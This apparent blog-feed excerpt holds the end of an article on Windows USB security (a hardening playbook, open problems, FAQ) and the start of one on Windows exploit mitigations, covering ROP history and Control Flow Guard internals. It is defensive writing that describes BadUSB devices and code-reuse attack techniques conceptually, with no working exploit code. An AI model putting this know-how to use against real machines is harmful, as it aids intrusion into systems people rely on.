HID re-enumeration detection. A thumb drive that mounts as Mass Storage, presents a benign-looking volume for a few seconds, and then re-enumerates as a composite device that adds a HID keyboard interface is the BadUSB signature [@srlabs-badusb-pdf]. No production host operating system detects this generically. A reasonable heuristic -- that a freshly enumerated device which changes its declared composition in the first fifteen seconds is suspicious -- is not in any Microsoft Defender for Endpoint hunting query as a shipped detection, only as a custom Defender XDR query an enterprise can compose itself. The heuristic is this article's own proposal, not a published primary source. Current best partial result: mature Microsoft Defender Experts customers are already deploying custom Defender XDR hunting queries that key on the post-attach composition-change pattern (typically joined against the BadUSB 200 ms keystroke-burst signature in §10.4); the detection exists in mature managed-detection-and-response practices but has not landed as a default rule in any shipping product.

USB-C Alternate Mode trust. DisplayPort Alt Mode, Thunderbolt Alt Mode, and USB4-tunneled PCIe each cross OS / firmware / silicon boundaries inside a single physical connector. The display-side firmware attack surface, the Power Delivery contract negotiation, and the "fast charge negotiation opens a data path" primitive that has emerged in commodity fast-charging hardware are all under-explored. Microsoft's Type-C UCM stack [@ms-typec] documents the connector-manager class extensions but does not (and cannot) verify the firmware behind the alt-mode peer. Current best partial result: the UCM UcmCx / UcmUcsiCx / UcmTcpciCx class-extension family ships in every Windows 11 SKU and gives the OS a uniform connector-state view it did not have before 2016 -- the partial mitigation is the architectural plumbing, not yet a firmware-attestation policy on top of it.

Supply-chain attacks on USB controller chips. The O.MG Cable shows that BadUSB is now manufacturing-implantable [@omg-cable]; the FBI's 2020 and 2022 FIN7 advisories show organized cybercriminal actors mailing the same primitive [@bleeping-fin7]. Hardware bill-of-materials attestation, Microsoft Defender for IoT inventory, and supply-chain risk-management frameworks (NIST SP 800-161 in the United States [@nist-sp-800-161]) are nascent on the consumer side and uneven on the enterprise side. Nothing on the consumer Windows endpoint defends the user from a cable that looks like a real cable. Current best partial result: the deployable enterprise stack is USB-IF Authentication 1.0 in the small set of authentication-capable peripherals [@usbif-auth-spec], plus Microsoft Defender for IoT device-inventory telemetry, plus per-organisation bring-your-own-cable allow-list policy primitives in Defender for Endpoint Device Control [@ms-devcontrol] -- a layered stack rather than a single defence.

Open-source memory-safe descriptor parser. Linux's usbcore has ongoing Rust experiments under the upstream Rust-for-Linux project [@rust-for-linux]; Microsoft has not committed to a similar rewrite. The bug-volume reduction from rewriting usbhub3.sys and usbccgp.sys in a memory-safe language would, on the basis of the public CVE record, dwarf any single mitigation in the article. The blocker is engineering scope, not technical feasibility. Current best partial result: the syzkaller-USB program has produced a continuously growing tally of kernel-side descriptor-parser bugs across host operating systems since 2017 [@syzkaller-usb], proving the attack surface is empirically large; the upstream Rust-for-Linux USB driver experiments are the only public evidence that a memory-safe rewrite of a production USB stack is practical at scale.

Note: "Vendor adoption" sounds like a feature-request line item rather than an open research problem. It is structural. Until a host OS commits silicon-supply-chain weight to USB-IF Authentication, the standards body has no influence on the peripheral vendors; until the peripheral vendors ship Authentication-capable silicon, the host OS sees no installed base to support. Solving the two-sided-market problem is the open problem -- not the cryptography.

The shortest path to closing the descriptor-trust gap runs through silicon (USB-IF Authentication), not through Windows. Until then, every defense in this article is layered around the gap, not on top of it.

10. A 2026 USB-Security Playbook for Windows IT

We have done the structural accounting. The reader who got this far is either a Windows internals engineer who wants the exact stack picture or an IT operator who needs to deploy something on Monday. The next four sub-sections are for that operator.

For end users

Do not plug in cables you did not buy. Do not use public USB charging stations. Brian Krebs reported the original juice-jacking demonstration verbatim in August 2011: "In the three and a half days of this year's DefCon, at least 360 attendees plugged their smartphones into the charging kiosk built by the same guys who run the infamous Wall of Sheep ... Brian Markus, president of Aires Security, said he and fellow researchers Joseph Mlodzianowski and Robert Rowley built the charging kiosk to educate attendees about the potential perils of juicing up at random power stations" [@krebs-juicejacking]. CISA's 2023 juice-jacking advisory and the FBI Denver Field Office's April 6, 2023 X.com warning trace their evidence base to the Aires Security demonstration and its lineage [@wiki-juicejacking]. If you must charge in public, use a USB data-blocker dongle (a passive accessory that breaks the data pins and passes only power).

For IT admins on Windows 11 Enterprise

Note: A minimal Windows 11 Enterprise USB-hardening baseline, in priority order: 1. Enable Kernel DMA Protection. Verify msinfo32 shows "Kernel DMA Protection: On". On firmware where the toggle is off, work with the OEM to turn it on in BIOS. Documentation: [@ms-kdp]. 2. Enable the ASR USB rule. Set GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 to Block via Intune or Group Policy. Verify with (Get-MpPreference).AttackSurfaceReductionRules_Ids. Documentation: [@ms-asr-rules]. 3. Configure Defender for Endpoint Device Control. Default-deny Mass Storage. Allow corporate HID by VID/PID/serial allow-list. Documentation: [@ms-devcontrol]. 4. Configure BitLocker To Go. Group Policy: Deny write access to removable drives not protected by BitLocker. Documentation: [@ms-bitlocker]. 5. Configure GPO Device Installation Restrictions. Use AllowedDeviceClasses with explicit USB / HID setup-class GUIDs to constrain which device classes can be installed in the first place. Documentation: [@ms-gpo-devinstall] [@ms-devsetupclasses]. 6. Audit USB device installation. Pull Event ID 6416 (PnP device installed) into your SIEM. Compose a Defender XDR hunting query for rapid-keystroke bursts in the first 15 seconds after a USB attach as a BadUSB / FIN7-style HID-injection signature [@bleeping-fin7].

*Not capable* means one of three things: the platform lacks an IOMMU (Intel VT-d or AMD-Vi disabled in firmware), the UEFI is not publishing the DMAR / IVRS ACPI tables, or no DMA-Remapping-compatible driver is loaded for at least one externally exposed peripheral. First check `Intel VT-d` or `AMD IOMMU` in the BIOS setup screen and enable them. If they are already on, confirm in `msinfo32` that *DMA Protection: ACPI* is *On* (the firmware-tables check). If the firmware is on and KDP still says *Not capable*, the per-driver opt-in path is the gap: open Device Manager and look at the *Hardware ID* tab of each Thunderbolt or USB4 peripheral; a driver without the `DmaRemappingCompatible=1` directive in its INF will not be IOMMU-isolated and downgrades the system-wide posture. The Microsoft Learn reference walks through the per-driver opt-in [@ms-dmaremap].

For driver developers

Declare DmaRemappingCompatible=1 in your INF if your hardware tolerates IOMMU isolation; this is a one-line directive change with a system-wide security posture improvement [@ms-dmaremap]. Prefer the WDF USB Lower / Upper filter pattern over legacy WDM; the framework's lifecycle and PnP plumbing are correct by construction in ways that legacy WDM code is not [@ms-usb-3-0-stack]. Validate every descriptor byte in user-mode tooling before relying on usbhub3.sys to do so; if your device cannot survive its own validator, the descriptor parser surface is wider than it needs to be. If you are writing a vendor-specific function driver, prefer winusb.sys over a custom KMDF function driver where possible [@ms-winusb]; less kernel-mode code is unambiguously better.

For red team and blue team

The reproducible test devices are USB Rubber Ducky II + DuckyScript 3.0 [@hak5-shop-ducky] [@hak5-ducky-docs] and the O.MG Cable [@omg-cable]. For inspection, usbview.exe from the Windows SDK reads live descriptor trees out of usbhub3.sys and is the closest thing Windows has to a USB-side lsusb -v. For trace evidence, the ETW providers Microsoft-Windows-USB-USBHUB3 and Microsoft-Windows-USB-USBPORT (older stack) carry enumeration sequences with per-stage timing, documented end-to-end in Microsoft's USB Event Tracing for Windows reference [@ms-usb-etw]; wireshark + USBPcap reads the raw descriptor bytes if the kernel-side capture is permitted. For blue-team detection, the BadUSB signature is "first observed time-since-attach to first keystroke event is less than 200 ms"; legitimate human-driven keyboards do not type at that rate.

The playbook is layered defense. None of these controls closes the descriptor-trust gap; together they raise the cost enough that the BadUSB-class attacks the article opens with become attacker-uneconomical in a corporate context. The structural problem is still open.

11. Frequently Asked Questions

The reader has the model. These are the seven misconceptions the model corrects.

No. BitLocker To Go protects *the data on the stick* if you lose it. A reprogrammed thumb drive that re-enumerates as a HID keyboard is unaffected because BitLocker never sees it as a managed volume in the first place [@ms-bitlocker]. BitLocker is a confidentiality control for data at rest on a removable volume; the malicious-peripheral problem is a problem of *peripheral authentication*, which BitLocker is not in the threat model of. No. KDP blocks pre-login DMA from PCIe-class peripherals tunneled over Thunderbolt 3, Thunderbolt 4, or USB4 [@ms-kdp]. A USB 2.0 thumb drive performs no DMA at all, so KDP is not in its defense chain. KDP is a defense against a different attack class than BadUSB. They are complementary, not substitutable. No. Driver signing certifies that Microsoft (or a paid-up OEM signed under Microsoft's signing infrastructure) approved the driver *code* [@ms-kmcs] [@ms-drvsigning]. It does not certify the *descriptors* the driver consumes at runtime. The signed `hidclass.sys` will load happily and inject keystrokes for any HID-class device whose descriptor declares it to be a keyboard, including a reprogrammed thumb drive. KMCS is a defense of the kernel against malicious drivers, not a defense of the kernel against malicious peripherals presenting valid descriptors to honest drivers. The Aside in Section 5 walks this point in detail. No, it closed one vector. The 2011 KB971029-equivalent rollout disabled `autorun.inf`-driven AutoPlay execution by default [@krebs-feb2011] [@wiki-autorun]. That vector was the load-bearing one for the Conficker era. It did not affect HID injection (which Hak5 had already commercialized in 2010), it did not affect descriptor-parser bugs (which Andy Davis named at Black Hat 2011 [@ncc-davis-2011]), and it did not affect the LNK-icon attack class (which the same Patch Tuesday addressed separately [@nvd-cve-2010-2568]). Each closed vector was a single-bug closure that left adjacent vectors intact. Real. The cable is commercially available; the firmware is technically documented in the product's own materials [@omg-cable]; the same primitive (a USB cable with a WiFi-enabled implant) is now in the FBI's threat reporting on FIN7 mailed-USB campaigns [@bleeping-fin7]. On a stock Windows 11 25H2 endpoint, the O.MG Cable's HID-injection primitive works exactly as advertised unless explicit Microsoft Defender for Endpoint Device Control policy blocks the HID class for that VID/PID/serial [@ms-devcontrol]. It is not a movie trope. Not yet, and not by itself. The USB-IF Authentication Specification Revision 1.0 ECN dates from January 7, 2019 [@usbif-auth-spec]. The standard defines ECDSA P-256 over SHA-256 with X.509 chains -- everyday cryptography. The structural problem is two-sided market adoption: no host operating system (Windows, macOS, Linux, ChromeOS) consumes the standard in-box in 2026, and no major device-certification tier requires it. Until that loop closes, the standard's existence is necessary but not sufficient. Mostly, with significant cost. Disabling USB controllers at firmware time blocks every USB attack class because no descriptors are ever parsed. It also blocks every keyboard, every mouse, every security token, every licensed peripheral, every biometric reader, every printer that does not speak network protocols, and every legitimate file transfer onto and off of the endpoint. The cost is usually higher than the threat for general-purpose business endpoints, but the trade-off is a legitimate one for tightly scoped roles like air-gapped industrial-control workstations.

Plugging in a USB device is the single most-trusted action a user routinely performs on a Windows machine. Windows has done forty years of work to walk that trust back -- bit by bit, single-bug closure by single-bug closure, generation by generation. Some of that work is silicon-level (Kernel DMA Protection over IOMMU). Some of it is kernel-level (Kernel-Mode Code Signing chained to a Microsoft-trusted root). Some of it is application-level (Attack Surface Reduction, Device Control, AutoRun disablement, BitLocker To Go). None of it -- not one of the ten generations the article walks -- has touched the descriptor-trust premise itself. A peripheral's self-declared identity is still its identity at enumeration time, in 2026 as in 1996.

The next breakthrough on this stack will not come from Windows. It will come from USB-IF Authentication finally shipping in commodity peripheral silicon, and a host operating system committing to consume it in-box. That shipment has now been seven years away for seven years. When it arrives -- if it arrives -- the descriptor-trust gap closes, the BadUSB primitive becomes detectable in the bus enumeration handshake, and the eleven kernel-mode operations that begin at 10:42:17 each morning finally consult something the peripheral cannot fake. Until then, the gap is the gap, and the layered mitigations Windows ships are what stand between a Phison microcontroller and your domain administrator credentials.

Process Mitigation Policies: CFG, ACG, CIG, and the Layer Between App Identity and the Kernel

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

Windows ships every modern memory-corruption mitigation as a per-process flag rather than a system-wide setting -- because Outlook can't enable CIG, Defender can't enable ACG, and Notepad doesn't need Disable-Win32k. `SetProcessMitigationPolicy` exposes twenty of these knobs (plus a `MaxProcessMitigationPolicy` sentinel that terminates the enum); the canonical six (DEP, ASLR, CFG, CET shadow stack, ACG, CIG) constrain the control-flow primitives, and the other fourteen cover adjacent attack surfaces. Each knob is a tombstone for an exploit primitive that worked in the previous generation. This article walks the thirty-year arc that built that surface, then names the residual attacks that survive even a fully-stacked process.

1. The bug is still there. Why didn't the exploit work?

A vulnerability researcher has just landed a type-confusion bug in a JavaScript engine inside an Edge content process. The primitive is exactly what they expected: a writable heap address holding a corrupted vtable pointer. From that pointer the renderer will, on its very next virtual-method call, jump into an address the attacker chose.

That is supposed to be game over. It is, in the language of every exploit-development textbook from 1996 onward, a working write-what-where. The CPU loads the corrupted pointer into a register. It dereferences it. It calls.

And the process dies.

There is no shell. There is no remote code execution. There is a Windows Error Reporting dialog and a STATUS_STACK_BUFFER_OVERRUN (also written FAST_FAIL_GUARD_ICALL_CHECK_FAILURE) in the crash log, raised from a thunk named ntdll!LdrpValidateUserCallTarget the researcher has never seen in their disassembler before. The bug fired exactly as the recipe said. The exploit chain didn't.

What stopped it?

Note: Every per-process mitigation in SetProcessMitigationPolicy is a tombstone for an exploit primitive that worked in the previous generation. The list of policies is, read top to bottom, an attacker's autobiography [@ms-setprocessmitigationpolicy].

A per-process, opt-in security policy installed via the Win32 `SetProcessMitigationPolicy` API (or, more safely, via `UpdateProcThreadAttribute` before a child process executes its first user-mode instruction). The `PROCESS_MITIGATION_POLICY` enum lists twenty-one values -- twenty actual policies plus the `MaxProcessMitigationPolicy` sentinel that terminates the enum -- as of Windows 11 24H2, each one a separate axis on which an exploit can fail [@ms-process-mitigation-enum, @ms-setprocessmitigationpolicy].

The fastest way to see this is to compare two PowerShell sessions. Pick a maximally-hardened process, the Edge content process, and run Get-ProcessMitigation -Name msedge.exe. Six mitigations show as ON: CFG, CET shadow stack, ACG, CIG, Disable-Win32k, and Disable-Extension-Points. Now do the same for Notepad.exe. One or two show as ON. Notepad is a different kind of process -- it is not parsing attacker-controlled bytes from the public internet, so the mitigation surface it carries is correspondingly small.

The mitigation set is not just an enable-everything list. Several of the policies are mutually expensive (CET costs cycles on every call/ret; ACG forbids any in-process JIT; CIG forbids any third-party plugin); turning them all on is only viable for a process whose owner accepts those costs. The PowerShell Set-ProcessMitigation and Get-ProcessMitigation cmdlets ship in the ProcessMitigations module that succeeded EMET in 2018.

Edge carries six mitigations because it has six structurally separate ways the attacker can win. CFG addresses the indirect-call hijack. CET addresses the return-address hijack. ACG addresses the "redirect the JIT to emit my shellcode" hijack. CIG addresses the "plant a Microsoft-signed DLL where the loader picks it up" hijack. Disable-Win32k addresses the renderer-to-kernel escape. Disable-Extension-Points addresses the AppInit_DLLs-class injection.

Each one is the closing footnote on a different generation of offensive research. CFG closes indirect-call hijacking. CET closes the shadow-stack-less era. ACG closes JIT spray. CIG closes signed-DLL planting. Get-ProcessMitigation lays them out as a flat list of ON checkmarks, as if they had always been there -- as if they had not each cost a decade of research to design and ship.

So the chain failed. But which mitigation caught the indirect-call hijack we started with -- and why was that one on? Where do these mitigations come from, and how did Windows arrive at this exact set? To answer that, we have to go back three decades.

2. How attackers stopped being able to put bytes on the stack and run them

The story starts in November 1996. Phrack magazine, issue forty-nine, file fourteen of sixteen. Aleph One -- the handle of Elias Levy, a security columnist who would later moderate the BugTraq mailing list -- publishes Smashing The Stack For Fun And Profit [@phrack-49-14]. The article is a recipe. It walks the reader through process memory layout on Unix, the structure of the call stack on x86, the mechanics of overwriting the saved return address, the construction of /bin/sh shellcode, and the use of NOP sleds. By the end the reader has working exploit code against syslog, splitvt, sendmail 8.7.5, and Linux/FreeBSD mount.

Buffer overflows existed before Aleph One. The 1988 Morris Worm used one in fingerd; Mudge's 1995 How to Write Buffer Overflows L0pht paper had pieces of the technique. But it was an oral tradition -- something you learned at DEFCON or from someone who learned it at DEFCON. Aleph One's contribution was pedagogical: a step-by-step recipe anyone with a debugger and an afternoon could follow. Once that recipe was published, every memory-safety bug in C and C++ -- and there were many -- became a candidate for shell-as-the-vendor.

The defensive response came fast, and it came with a brutal honesty that has shaped every later mitigation. In August 1997, Alexander Peslyak, writing under the handle Solar Designer and running the Openwall Project, posted to BugTraq [@solar-designer-bugtraq-1997]. He had two things. The first was a Linux kernel patch -- still documented at the Openwall README to this day -- that made user-mode stack pages non-executable in software, since AMD's hardware NX bit was six years away [@openwall-readme]. The second was a working return-into-libc exploit against lpr, which redirected execution into system() in the C library rather than into stack-resident shellcode.Solar Designer was honest enough to publish the bypass on the same day as the patch. This is a defender-publishes-own-bypass precedent that has governed almost every Microsoft mitigation announcement since: ship the mitigation, name the residual attack class, set the expectation that the mitigation is a speed bump rather than a fix.

A memory protection invariant -- "write XOR execute" -- requiring that any page in the process address space be either writable or executable, but never both at the same time. PaX shipped the first complete implementation of W^X on Linux in 2000; AMD's NX bit in 2003 moved it from software emulation to hardware enforcement; the per-process ACG policy in Windows generalises W^X to apply for the lifetime of an entire process, with no per-thread escape hatch.

The next move was structural. In September 2000 the pseudonymous PaX Team released PAGEEXEC, the Linux non-executable-page implementation that made every writable page non-executable (not just the stack), using clever x86 segment-limit and split-TLB tricks [@wiki-pax]. PaX is also where the term "ASLR" comes from. The July 2001 PaX patch series randomized the executable base, the stack, the heap, the mmap'd library region, and (with RANDEXEC) even the position of the executable's code segment. The PaX design document for ASLR is unusually rigorous about probability -- it derives the expected number of brute-force attempts as a function of entropy bits, decades before anyone framed it that way in the academic literature.

Address Space Layout Randomization. Per-boot or per-load randomization of the locations at which the kernel maps modules, the stack, the heap, and `mmap`'d regions into a process's virtual address space. On x86-32 Windows Vista, modules had one of 256 possible base addresses (about 8 bits of entropy). On x64 with `/HIGHENTROPYVA`, entropy is much higher because the virtual address space is larger. ASLR is the precondition that makes every later forward-edge CFI scheme worth deploying -- without it, the attacker just hardcodes the call target.

Hardware finally caught up on September 23, 2003. AMD shipped the no-execute bit -- "NX bit," bit 63 of the 64-bit long-mode page-table entry -- with the Athlon 64 launch [@wiki-nx-bit]. Intel followed with the marketing-renamed "XD bit" in later Pentium 4 Prescott silicon. From 2003 onward, marking a page non-executable was a single PTE flag away.

Microsoft consumed the hardware almost immediately. Windows XP Service Pack 2, RTM August 6, 2004, shipped Data Execution Prevention as a system-wide feature. DEP defaulted to OptIn but supported four system-level modes (OptIn, OptOut, AlwaysOn, AlwaysOff) and exposed a per-binary opt-in via the /NXCOMPAT PE-header flag. On hardware without NX, DEP fell back to a software emulation limited to system-supplied binaries.

The Wikipedia ROP article frames this moment exactly: "Microsoft Windows provided no buffer-overrun protections until 2004" [@wiki-rop]. After XP SP2, Windows joined PaX, OpenBSD, and Solar Designer's Openwall on the W^X side of the line.

Three years later, in January 2007, Microsoft shipped Vista. Vista randomized DLL and EXE module bases at boot, with 256 possible load locations per module on x86. Michael Howard's MSDN design blog from May 2006 gives a worked example showing wsock32.dll at 0x73ad0000 on one boot and 0x73200000 on the next [@ms-howard-vista-aslr]. Vista paired ASLR with /GS stack canaries, /SafeSEH validated SEH chains, DEP, and pointer obfuscation -- the first Microsoft OS to ship a layered exploit-mitigation stack as policy.

flowchart LR A[1996 Nov
Aleph One
Phrack 49 14] --> B[1997 Aug
Solar Designer
non-exec stack
+ return-into-libc] B --> C[2000 Sep
PaX Team
PAGEEXEC] C --> D[2001 Jul
PaX
first ASLR] D --> E[2003 Sep
AMD NX bit
Athlon 64] E --> F[2004 Aug
Microsoft DEP
Windows XP SP2] F --> G[2006 May
Microsoft
Vista ASLR design] G --> H[2007 Jan
Vista GA
layered mitigation]

DEP and ASLR are not per-process mitigations in the modern sense. They are the system-wide foundation that the per-process surface sits on top of. The reason ProcessDEPPolicy still exists in the modern enum at all is to give 32-bit processes a way to enforce DEP locally even when the system policy is permissive. On x64, DEP is unconditionally on; the per-process knob is a vestigial 32-bit-only flag. ProcessASLRPolicy is more useful -- it allows a process to force-on high-entropy bottom-up randomization with ForceRelocateImages -- but it too is a refinement of a system-wide foundation, not a new defensive primitive [@ms-setprocessmitigationpolicy].

By 2007, the story should have been over. DEP had made shellcode unrunnable. ASLR had made gadget addresses unpredictable. Every attacker primitive Aleph One named in 1996 was, in principle, defended. It was not.

Because the attacker did not need to write new bytes. They could reuse the bytes that were already there.

3. ASLR plus DEP made shellcode hard, so attackers stopped writing shellcode

October 2007. Hovav Shacham, then on the UC San Diego computer-science faculty after a postdoctoral fellowship at the Weizmann Institute, presents The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) at ACM CCS [@shacham-rop-pdf]. The paper's existence claim is simple and devastating: in any sufficiently large C library, the set of short instruction sequences ending in ret is Turing-complete. The attacker does not need to inject any new code. They only need to write data -- a sequence of return addresses on the stack -- and the CPU obediently executes already-mapped, already-executable libc bytes in the attacker's chosen order.

The mechanism is small enough to explain in a paragraph. Shacham named the technique return-oriented programming. The attacker arranges for the program to return into a gadget -- a short sequence of one to four instructions ending in ret. The gadget is selected from existing executable memory: libc, ntdll, the program's own code segment. The instructions perform a useful primitive (load a register, do arithmetic, dereference a pointer). The trailing ret pops the next stack slot, which the attacker has populated with the address of the next gadget. The stack is now the program counter; the CPU is now a Turing-complete machine for whatever language the gadget catalog implements.

An exploitation technique in which the attacker chains short, existing instruction sequences ("gadgets") each ending in `ret`. Control transfers happen via the program's own return instructions, executing already-mapped, already-executable code. ROP defeats W^X (DEP, NX) because the attacker injects no new code; it weakens against ASLR but does not break under it because info-leak primitives recover the gadget base address. Coined by Hovav Shacham in 2007 [@shacham-rop-pdf].

The follow-up Black Hat USA 2008 talk generalised the result to RISC architectures [@shacham-bhusa-2008], killing "x86's variable-length instructions are why ROP works" as a defensive direction. ROP works on ARM. ROP works on MIPS. ROP works wherever an attacker can predict the address of executable bytes and control the stack.

Return-oriented programming allows an attacker to execute code in the presence of security defenses such as executable space protection. -- Wikipedia, *Return-oriented programming*, lead paragraph [@wiki-rop]

After 2007, the structural agenda of every defensive engineering team on Windows changes. The question is no longer "can we stop the attacker from writing bytes into executable pages?" -- DEP solved that, and ROP routed around it. The question is now: "which control transfers is the attacker allowed to cause?"

Shacham's UCSD lab (later UT Austin) kept exploring the boundary between code-reuse attacks and provable software defenses. The 2007 paper is the field-shaping one; the 2008 BHUSA generalisation to RISC was the closing argument.

Key idea: After Shacham 2007, every defensive engineering decision in Windows mitigation has been about which control-flow transfers the attacker is allowed to cause, not about what bytes the attacker can write. This is the article's load-bearing axis. CFG, XFG, CET, ACG, CIG, and every smaller mitigation in PROCESS_MITIGATION_POLICY follows from this one shift.

Microsoft's first response was behavioral, not structural. In 2009 the company released the Enhanced Mitigation Experience Toolkit (EMET), a free shim DLL that injected runtime checks into existing user-mode processes to detect ROP-shaped behavior. EMET checked for stack pivots, for unaligned ret-targets, for known-malicious gadget sequences, for unusual SEH chain layouts. It worked, intermittently, for a while. Then attackers adjusted, gadget-replacing around EMET's heuristics, and Microsoft slowly conceded the behavioral-detection direction was a dead end. EMET's final release was 5.52 in November 2016; end of life was July 31, 2018 [@wiki-emet]. Microsoft's stated successors are the ProcessMitigations PowerShell module and Windows Defender Exploit Guard -- i.e., the formal SetProcessMitigationPolicy surface this article catalogs [@wiki-emet].

EMET was an honorable failure. It taught the security industry that you cannot detect a control-flow hijack by looking at its symptoms; you can only prevent it by enforcing an invariant on the control flow itself. That lesson is exactly what Control Flow Guard (CFG) and Control-Flow Enforcement Technology (CET) embody. Every behavioral-ROP-detection product since EMET (Carbon Black's BB exploit protection, Symantec's Heat Shield, vendor-specific EDR ROP checks) has had the same fate against motivated adversaries -- you can buy time but you cannot fix the problem in heuristics.

The structural answer arrived two years before the offensive proof that motivated it. In November 2005, at ACM CCS, Martín Abadi, Mihai Budiu, Úlfar Erlingsson, and Jay Ligatti published Control-Flow Integrity (also released as Microsoft Research Technical Report MSR-TR-2005-18) [@msr-cfi]. Their formal definition is short: the execution of a program dynamically follows only paths defined by a static control-flow graph. They proved CFI is enforceable using compile-time-inserted runtime checks and demonstrated a software rewriting implementation.

A defensive property formalized by Abadi, Budiu, Erlingsson, and Ligatti in 2005 [@msr-cfi]: the execution of a program must dynamically follow only paths defined by the static control-flow graph (CFG) of the program. CFI partitions into a forward-edge property (the targets of indirect calls and jumps must be valid) and a backward-edge property (the targets of returns must be the call-sites that called them). CFG, XFG, kCFG, and Apple's PAC are forward-edge CFI implementations. CET's shadow stack is a backward-edge CFI implementation.

CFI was a research framework looking for a vendor. It would wait nine years. The reader's belief at this point might be "DEP plus ASLR is enough." The honest belief, after Shacham, is that DEP plus ASLR raises the cost but does not change the game. The attacker still wins if they can choose where the next ret lands. The structural answer -- constraining the control transfer rather than the write -- is what makes Control Flow Guard make sense.

What does constraining the control transfer look like in machine code?

4. Control Flow Guard (CFG): compile-time, load-time, runtime

Where DEP was enforced by hardware on every page, CFG is enforced by software on every indirect call. The compiler is now a security tool.

CFG's ship history is more complicated than the marketing remembers. The canonical primary on the early dates is Yunhai Zhang's Black Hat USA 2015 deck, Bypass Control Flow Guard Comprehensively, which states verbatim: "It was first introduced in Windows 8.1 Preview, but disabled in Windows 8.1 RTM for compatibility reason. Then, it was improved and enabled in Windows 10 Technical Preview and Windows 8.1 Update" [@zhang-bhusa15]. Visual Studio 2015 added the compiler and linker flags. By the time Windows 10 shipped to consumers in July 2015, CFG was a documented Win32 security feature [@ms-cfg-doc].Stage 1 had this ship date as "Windows 8.1 Update 3 November 2014 vs Windows 10 July 2015". Zhang's deck is the contemporaneous primary that resolves the dispute. CFG was in Windows 8.1 Preview, was removed from Windows 8.1 RTM for compatibility, returned in Windows 8.1 Update and Windows 10 Technical Preview, and shipped widely with Windows 10 in 2015.

The mechanism has four phases. Each phase is a separate engineering subsystem, owned by a different team.

Phase 1: Compile-time (/guard:cf). The MSVC compiler emits, before every indirect call instruction, a call to one of two compiler-supplied thunks: __guard_check_icall_fptr for the standard pattern, or __guard_dispatch_icall_fptr for the tail-call optimization where the validator itself jumps to the target [@ms-guard-cf-compiler]. The thunk is a single indirection through ntdll. At compile time it is a stub; at load time it is patched to point at the active validator.

Phase 2: Link-time (/GUARD:CF, which requires /DYNAMICBASE). The linker writes the Guard CF Function Table (FID table) into the PE image's IMAGE_LOAD_CONFIG_DIRECTORY [@ms-guard-cf-linker]. This table is the static catalog of every CFG-valid call target in this binary: every function whose address is taken, plus every function exported. dumpbin /headers /loadconfig <binary> prints the table contents -- you can read the actual Guard CF flag word and the FID table present line.

Note: The MSVC linker only emits the FID table when /DYNAMICBASE is also set [@ms-guard-cf-compiler, @ms-guard-cf-linker]. A binary compiled with /guard:cf but linked without /DYNAMICBASE will pass code review, ship, and provide zero protection at runtime. This is the single most common CFG misconfiguration in third-party software. Always confirm with dumpbin /headers /loadconfig that the Guard Flags word is non-zero and that FID Table present is in the output.

Phase 3: Load-time. At process startup and on every subsequent LoadLibrary, ntdll!LdrpProtectAndRelocateImage unions the FID table of the loaded image into a per-process bitmap. The bitmap is a sparse data structure with one bit per 8 bytes of virtual address space. On 32-bit Windows, that is about 32 megabytes of address space worth of valid-target bits. On x64, the address space is so large the bitmap is hundreds of megabytes sparse-allocated -- but the memory only commits on access, so the resident set stays small.

A sparse, per-process bit vector indexed by virtual address (one bit per 8 bytes). A set bit at index `addr / 8` means that `addr` is a CFG-valid indirect-call target in some loaded image. The kernel commits the bitmap pages on first access and shares them copy-on-write across processes with identical module-load layouts. The bitmap is the runtime data structure that `LdrpValidateUserCallTarget` consults on every indirect call.

Phase 4: Runtime. Every indirect call goes through ntdll!LdrpValidateUserCallTarget. The validator takes the call target in rcx (x64 calling convention), divides by 8, indexes into the bitmap, and tests the bit. If set, return; the call proceeds. If clear, fall through to __fastfail(FAST_FAIL_GUARD_ICALL_CHECK_FAILURE), which raises STATUS_STACK_BUFFER_OVERRUN. The process dies.

sequenceDiagram participant Src as C++ source participant CC as "MSVC /guard:cf" participant Ln as "Linker /GUARD:CF /DYNAMICBASE" participant Ldr as ntdll loader participant Rt as Runtime Src->>CC: address-taken funcs plus indirect call sites CC->>Ln: object file plus FID hints Ln->>Ldr: PE with FID table in load-config dir Ldr->>Ldr: union FID table into bitmap Note over Ldr: one bit per 8 bytes Rt->>Ldr: indirect call via LdrpValidateUserCallTarget alt bit set Ldr->>Rt: proceed else bit clear Ldr->>Rt: fastfail STATUS_STACK_BUFFER_OVERRUN end

There is an exception: code that is generated at runtime, like a JavaScript JIT, cannot have its targets pre-baked into a static FID table. For this case, CFG exposes SetProcessValidCallTargets, which lets a process programmatically mark an in-process address range as a permitted call target [@ms-cfg-doc]. The companion PAGE_TARGETS_INVALID and PAGE_TARGETS_NO_UPDATE page-protection flags let the process control which newly-allocated pages start with a clear bitmap. The reason this API exists at all is the structural collision between W^X-via-CFG and runtime code generation -- a collision that section 8 (ACG) will eventually resolve by moving the JIT out of process.

You can read the load-config flag word directly. The hex value is a bit field of IMAGE_GUARD_* constants. The most common bits are IMAGE_GUARD_CF_INSTRUMENTED (the binary has CFG indirect-call checks), IMAGE_GUARD_CFW_INSTRUMENTED (the binary has CFG indirect-call checks plus write-protection checks), IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT (the FID table is in the PE), IMAGE_GUARD_CF_LONGJUMP_TABLE_PRESENT, and IMAGE_GUARD_RETPOLINE_PRESENT. The decoder is short enough to inline:

{` const FLAGS = [ [0x00000100, 'IMAGE_GUARD_CF_INSTRUMENTED'], [0x00000200, 'IMAGE_GUARD_CFW_INSTRUMENTED'], [0x00000400, 'IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT'], [0x00000800, 'IMAGE_GUARD_SECURITY_COOKIE_UNUSED'], [0x00001000, 'IMAGE_GUARD_PROTECT_DELAYLOAD_IAT'], [0x00002000, 'IMAGE_GUARD_DELAYLOAD_IAT_IN_ITS_OWN_SECTION'], [0x00004000, 'IMAGE_GUARD_CF_EXPORT_SUPPRESSION_INFO_PRESENT'], [0x00008000, 'IMAGE_GUARD_CF_ENABLE_EXPORT_SUPPRESSION'], [0x00010000, 'IMAGE_GUARD_CF_LONGJUMP_TABLE_PRESENT'], [0x00020000, 'IMAGE_GUARD_RF_INSTRUMENTED'], [0x00040000, 'IMAGE_GUARD_RF_ENABLE'], [0x00080000, 'IMAGE_GUARD_RF_STRICT'], [0x00100000, 'IMAGE_GUARD_RETPOLINE_PRESENT'], ];

